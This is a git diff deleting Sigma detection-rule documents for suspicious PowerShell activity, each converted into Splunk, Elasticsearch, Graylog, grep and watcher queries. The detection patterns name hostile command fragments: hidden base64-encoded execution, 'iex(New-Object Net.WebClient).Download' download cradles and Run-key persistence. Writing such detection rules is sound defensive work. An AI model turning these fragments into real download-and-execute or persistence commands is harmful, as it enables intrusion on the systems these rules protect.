-    - Very special / sneaky PowerShell scripts
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match " -enc " -or $_.message -match " -EncodedCommand ") -and ($_.message -match " -w hidden " -or $_.message -match " -window hidden " -or $_.message -match " -windowstyle hidden ") -and ($_.message -match " -noni " -or $_.message -match " -noninteractive ")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(\*.keyword:(*\ \-enc\ * OR *\ \-EncodedCommand\ *) AND \*.keyword:(*\ \-w\ hidden\ * OR *\ \-window\ hidden\ * OR *\ \-windowstyle\ hidden\ *) AND \*.keyword:(*\ \-noni\ * OR *\ \-noninteractive\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3d304fda-78aa-43ed-975c-d740798a49c1 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PowerShell Invocations - Generic",
-    "description": "Detects suspicious PowerShell invocation command parameters",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(\\*.keyword:(*\\ \\-enc\\ * OR *\\ \\-EncodedCommand\\ *) AND \\*.keyword:(*\\ \\-w\\ hidden\\ * OR *\\ \\-window\\ hidden\\ * OR *\\ \\-windowstyle\\ hidden\\ *) AND \\*.keyword:(*\\ \\-noni\\ * OR *\\ \\-noninteractive\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(\\*.keyword:(*\\ \\-enc\\ * OR *\\ \\-EncodedCommand\\ *) AND \\*.keyword:(*\\ \\-w\\ hidden\\ * OR *\\ \\-window\\ hidden\\ * OR *\\ \\-windowstyle\\ hidden\\ *) AND \\*.keyword:(*\\ \\-noni\\ * OR *\\ \\-noninteractive\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PowerShell Invocations - Generic'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(\*.keyword:(* \-enc * OR * \-EncodedCommand *) AND \*.keyword:(* \-w hidden * OR * \-window hidden * OR * \-windowstyle hidden *) AND \*.keyword:(* \-noni * OR * \-noninteractive *))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " -windowstyle hidden ") (" -noni " OR " -noninteractive "))
-```
-
-
-### logpoint
-    
-```
-((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " -windowstyle hidden ") (" -noni " OR " -noninteractive "))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.* -enc |.* -EncodedCommand )))(?=.*(?:.*(?:.* -w hidden |.* -window hidden |.* -windowstyle hidden )))(?=.*(?:.*(?:.* -noni |.* -noninteractive ))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_specific.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_specific.md
deleted file mode 100644
index 01ba4e5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_specific.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Suspicious PowerShell Invocations - Specific       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious PowerShell invocation command parameters |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PowerShell Invocations - Specific
-id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
-status: experimental
-description: Detects suspicious PowerShell invocation command parameters
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Florian Roth (rule)
-date: 2017/03/05
-logsource:
-    product: windows
-    service: powershell
-detection:
-    keywords:
-        Message:
-            - '* -nop -w hidden -c * [Convert]::FromBase64String*'
-            - '* -w hidden -noni -nop -c "iex(New-Object*'
-            - '* -w hidden -ep bypass -Enc*'
-            - '*powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run*'
-            - '*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*'
-            - '*iex(New-Object Net.WebClient).Download*'
-    condition: keywords
-falsepositives:
-    - Penetration tests
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "Message.*.* -nop -w hidden -c .* [Convert]::FromBase64String.*" -or $_.message -match "Message.*.* -w hidden -noni -nop -c \"iex(New-Object.*" -or $_.message -match "Message.*.* -w hidden -ep bypass -Enc.*" -or $_.message -match "Message.*.*powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run.*" -or $_.message -match "Message.*.*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download.*" -or $_.message -match "Message.*.*iex(New-Object Net.WebClient).Download.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-Message.keyword:(*\ \-nop\ \-w\ hidden\ \-c\ *\ \[Convert\]\:\:FromBase64String* OR *\ \-w\ hidden\ \-noni\ \-nop\ \-c\ \"iex\(New\-Object* OR *\ \-w\ hidden\ \-ep\ bypass\ \-Enc* OR *powershell.exe\ reg\ add\ HKCU\\software\\microsoft\\windows\\currentversion\\run* OR *bypass\ \-noprofile\ \-windowstyle\ hidden\ \(new\-object\ system.net.webclient\).download* OR *iex\(New\-Object\ Net.WebClient\).Download*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fce5f582-cc00-41e1-941a-c6fabf0fdb8c <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PowerShell Invocations - Specific",
-    "description": "Detects suspicious PowerShell invocation command parameters",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "Message.keyword:(*\\ \\-nop\\ \\-w\\ hidden\\ \\-c\\ *\\ \\[Convert\\]\\:\\:FromBase64String* OR *\\ \\-w\\ hidden\\ \\-noni\\ \\-nop\\ \\-c\\ \\\"iex\\(New\\-Object* OR *\\ \\-w\\ hidden\\ \\-ep\\ bypass\\ \\-Enc* OR *powershell.exe\\ reg\\ add\\ HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run* OR *bypass\\ \\-noprofile\\ \\-windowstyle\\ hidden\\ \\(new\\-object\\ system.net.webclient\\).download* OR *iex\\(New\\-Object\\ Net.WebClient\\).Download*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "Message.keyword:(*\\ \\-nop\\ \\-w\\ hidden\\ \\-c\\ *\\ \\[Convert\\]\\:\\:FromBase64String* OR *\\ \\-w\\ hidden\\ \\-noni\\ \\-nop\\ \\-c\\ \\\"iex\\(New\\-Object* OR *\\ \\-w\\ hidden\\ \\-ep\\ bypass\\ \\-Enc* OR *powershell.exe\\ reg\\ add\\ HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run* OR *bypass\\ \\-noprofile\\ \\-windowstyle\\ hidden\\ \\(new\\-object\\ system.net.webclient\\).download* OR *iex\\(New\\-Object\\ Net.WebClient\\).Download*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PowerShell Invocations - Specific'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Message.keyword:(* \-nop \-w hidden \-c * \[Convert\]\:\:FromBase64String* * \-w hidden \-noni \-nop \-c \"iex\(New\-Object* * \-w hidden \-ep bypass \-Enc* *powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run* *bypass \-noprofile \-windowstyle hidden \(new\-object system.net.webclient\).download* *iex\(New\-Object Net.WebClient\).Download*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (Message="* -nop -w hidden -c * [Convert]::FromBase64String*" OR Message="* -w hidden -noni -nop -c \"iex(New-Object*" OR Message="* -w hidden -ep bypass -Enc*" OR Message="*powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run*" OR Message="*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*" OR Message="*iex(New-Object Net.WebClient).Download*"))
-```
-
-
-### logpoint
-    
-```
-Message IN ["* -nop -w hidden -c * [Convert]::FromBase64String*", "* -w hidden -noni -nop -c \"iex(New-Object*", "* -w hidden -ep bypass -Enc*", "*powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run*", "*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*", "*iex(New-Object Net.WebClient).Download*"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* -nop -w hidden -c .* \[Convert\]::FromBase64String.*|.*.* -w hidden -noni -nop -c "iex\(New-Object.*|.*.* -w hidden -ep bypass -Enc.*|.*.*powershell\.exe reg add HKCU\software\microsoft\windows\currentversion\run.*|.*.*bypass -noprofile -windowstyle hidden \(new-object system\.net\.webclient\)\.download.*|.*.*iex\(New-Object Net\.WebClient\)\.Download.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_keywords.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_keywords.md
deleted file mode 100644
index f8b2234..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_keywords.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Suspicious PowerShell Keywords       |
-|:-------------------------|:------------------|
-| **Description**          | Detects keywords that could indicate the use of some PowerShell exploitation framework |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462](https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462)</li><li>[https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1)</li><li>[https://github.com/hlldz/Invoke-Phant0m/blob/master/Invoke-Phant0m.ps1](https://github.com/hlldz/Invoke-Phant0m/blob/master/Invoke-Phant0m.ps1)</li></ul>  |
-| **Author**               | Florian Roth, Perez Diego (@darkquassar) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PowerShell Keywords
-id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
-status: experimental
-description: Detects keywords that could indicate the use of some PowerShell exploitation framework
-date: 2019/02/11
-author: Florian Roth, Perez Diego (@darkquassar)
-references:
-    - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
-    - https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
-    - https://github.com/hlldz/Invoke-Phant0m/blob/master/Invoke-Phant0m.ps1
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    product: windows
-    service: powershell
-    definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277. Monitor for EventID 4104'
-detection:
-    keywords:
-        Message:
-            - "System.Reflection.Assembly.Load"
-            - "[System.Reflection.Assembly]::Load"
-            - "[Reflection.Assembly]::Load"
-            - "System.Reflection.AssemblyName"
-            - "Reflection.Emit.AssemblyBuilderAccess"
-            - "Runtime.InteropServices.DllImportAttribute"
-            - "SuspendThread"
-    condition: keywords
-falsepositives:
-    - Penetration tests
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "System.Reflection.Assembly.Load" -or $_.message -match "[System.Reflection.Assembly]::Load" -or $_.message -match "[Reflection.Assembly]::Load" -or $_.message -match "System.Reflection.AssemblyName" -or $_.message -match "Reflection.Emit.AssemblyBuilderAccess" -or $_.message -match "Runtime.InteropServices.DllImportAttribute" -or $_.message -match "SuspendThread")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-Message:("System.Reflection.Assembly.Load" OR "\[System.Reflection.Assembly\]\:\:Load" OR "\[Reflection.Assembly\]\:\:Load" OR "System.Reflection.AssemblyName" OR "Reflection.Emit.AssemblyBuilderAccess" OR "Runtime.InteropServices.DllImportAttribute" OR "SuspendThread")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1f49f2ab-26bc-48b3-96cc-dcffbc93eadf <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PowerShell Keywords",
-    "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "Message:(\"System.Reflection.Assembly.Load\" OR \"\\[System.Reflection.Assembly\\]\\:\\:Load\" OR \"\\[Reflection.Assembly\\]\\:\\:Load\" OR \"System.Reflection.AssemblyName\" OR \"Reflection.Emit.AssemblyBuilderAccess\" OR \"Runtime.InteropServices.DllImportAttribute\" OR \"SuspendThread\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "Message:(\"System.Reflection.Assembly.Load\" OR \"\\[System.Reflection.Assembly\\]\\:\\:Load\" OR \"\\[Reflection.Assembly\\]\\:\\:Load\" OR \"System.Reflection.AssemblyName\" OR \"Reflection.Emit.AssemblyBuilderAccess\" OR \"Runtime.InteropServices.DllImportAttribute\" OR \"SuspendThread\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PowerShell Keywords'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Message:("System.Reflection.Assembly.Load" "\[System.Reflection.Assembly\]\:\:Load" "\[Reflection.Assembly\]\:\:Load" "System.Reflection.AssemblyName" "Reflection.Emit.AssemblyBuilderAccess" "Runtime.InteropServices.DllImportAttribute" "SuspendThread")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (Message="System.Reflection.Assembly.Load" OR Message="[System.Reflection.Assembly]::Load" OR Message="[Reflection.Assembly]::Load" OR Message="System.Reflection.AssemblyName" OR Message="Reflection.Emit.AssemblyBuilderAccess" OR Message="Runtime.InteropServices.DllImportAttribute" OR Message="SuspendThread"))
-```
-
-
-### logpoint
-    
-```
-Message IN ["System.Reflection.Assembly.Load", "[System.Reflection.Assembly]::Load", "[Reflection.Assembly]::Load", "System.Reflection.AssemblyName", "Reflection.Emit.AssemblyBuilderAccess", "Runtime.InteropServices.DllImportAttribute", "SuspendThread"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*System\.Reflection\.Assembly\.Load|.*\[System\.Reflection\.Assembly\]::Load|.*\[Reflection\.Assembly\]::Load|.*System\.Reflection\.AssemblyName|.*Reflection\.Emit\.AssemblyBuilderAccess|.*Runtime\.InteropServices\.DllImportAttribute|.*SuspendThread)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_profile_create.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_profile_create.md
deleted file mode 100644
index 92f592b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_profile_create.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Powershell Profile.ps1 Modification       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a change in profile.ps1 of the Powershell profile |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>System administrator create Powershell profile manually</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/](https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/)</li></ul>  |
-| **Author**               | HieuTT35 |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Powershell Profile.ps1 Modification
-id: b5b78988-486d-4a80-b991-930eff3ff8bf
-status: experimental
-description: Detects a change in profile.ps1 of the Powershell profile
-references:
-    - https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
-author: HieuTT35
-date: 2019/10/24
-modified: 2020/04/03
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    event:
-        EventID: 11
-    target1:
-        TargetFilename|contains|all: 
-            - '\My Documents\PowerShell\'
-            - '\profile.ps1'
-    target2:
-        TargetFilename|contains|all: 
-            - 'C:\Windows\System32\WindowsPowerShell\v1.0\'
-            - '\profile.ps1'
-    condition: event and (target1 or target2)
-falsepositives:
-    - System administrator create Powershell profile manually
-level: high
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "11" -and $_.message -match "TargetFilename.*.*\\profile.ps1.*" -and ($_.message -match "TargetFilename.*.*\\My Documents\\PowerShell\\.*" -or $_.message -match "TargetFilename.*.*C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"11" AND winlog.event_data.TargetFilename.keyword:*\\profile.ps1* AND (winlog.event_data.TargetFilename.keyword:*\\My\ Documents\\PowerShell\\* OR winlog.event_data.TargetFilename.keyword:*C\:\\Windows\\System32\\WindowsPowerShell\\v1.0\\*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b5b78988-486d-4a80-b991-930eff3ff8bf <<EOF
-{
-  "metadata": {
-    "title": "Powershell Profile.ps1 Modification",
-    "description": "Detects a change in profile.ps1 of the Powershell profile",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:*\\\\profile.ps1* AND (winlog.event_data.TargetFilename.keyword:*\\\\My\\ Documents\\\\PowerShell\\\\* OR winlog.event_data.TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:*\\\\profile.ps1* AND (winlog.event_data.TargetFilename.keyword:*\\\\My\\ Documents\\\\PowerShell\\\\* OR winlog.event_data.TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Powershell Profile.ps1 Modification'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"11" AND TargetFilename.keyword:*\\profile.ps1* AND (TargetFilename.keyword:*\\My Documents\\PowerShell\\* OR TargetFilename.keyword:*C\:\\Windows\\System32\\WindowsPowerShell\\v1.0\\*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="11" TargetFilename="*\\profile.ps1*" (TargetFilename="*\\My Documents\\PowerShell\\*" OR TargetFilename="*C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="11" TargetFilename="*\\profile.ps1*" (TargetFilename="*\\My Documents\\PowerShell\\*" OR TargetFilename="*C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*11)(?=.*.*\profile\.ps1.*)(?=.*(?:.*(?:.*.*\My Documents\PowerShell\\.*|.*.*C:\Windows\System32\WindowsPowerShell\v1\.0\\.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_winlogon_helper_dll.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_winlogon_helper_dll.md
deleted file mode 100644
index 98fec77..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_winlogon_helper_dll.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Winlogon Helper DLL       |
-|:-------------------------|:------------------|
-| **Description**          | Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1004: Winlogon Helper DLL](https://attack.mitre.org/techniques/T1004)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1004/T1004.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1004/T1004.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, oscd.community |
-| Other Tags           | <ul><li>attack.t1547.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Winlogon Helper DLL
-id: 851c506b-6b7c-4ce2-8802-c703009d03c0
-status: experimental
-description: Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.
-author: Timur Zinniatullin, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1004/T1004.yaml
-logsource:
-    product: windows
-    service: powershell
-    description: 'Script block logging must be enabled'
-detection:
-    selection:
-        EventID: 4104
-    keyword1:
-        - '*Set-ItemProperty*'
-        - '*New-Item*'
-    keyword2:
-        - '*CurrentVersion\Winlogon*'
-    condition: selection and ( keyword1 and keyword2 )
-falsepositives:
-    - Unknown
-level: medium
-tags:
-    - attack.persistence
-    - attack.t1004
-    - attack.t1547.004
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.ID -eq "4104" -and ($_.message -match "*Set-ItemProperty*" -or $_.message -match "*New-Item*") -and $_.message -match "*CurrentVersion\Winlogon*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"4104" AND \*.keyword:(*Set\-ItemProperty* OR *New\-Item*) AND "*CurrentVersion\\Winlogon*")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/851c506b-6b7c-4ce2-8802-c703009d03c0 <<EOF
-{
-  "metadata": {
-    "title": "Winlogon Helper DLL",
-    "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1004",
-      "attack.t1547.004"
-    ],
-    "query": "(winlog.event_id:\"4104\" AND \\*.keyword:(*Set\\-ItemProperty* OR *New\\-Item*) AND \"*CurrentVersion\\\\Winlogon*\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
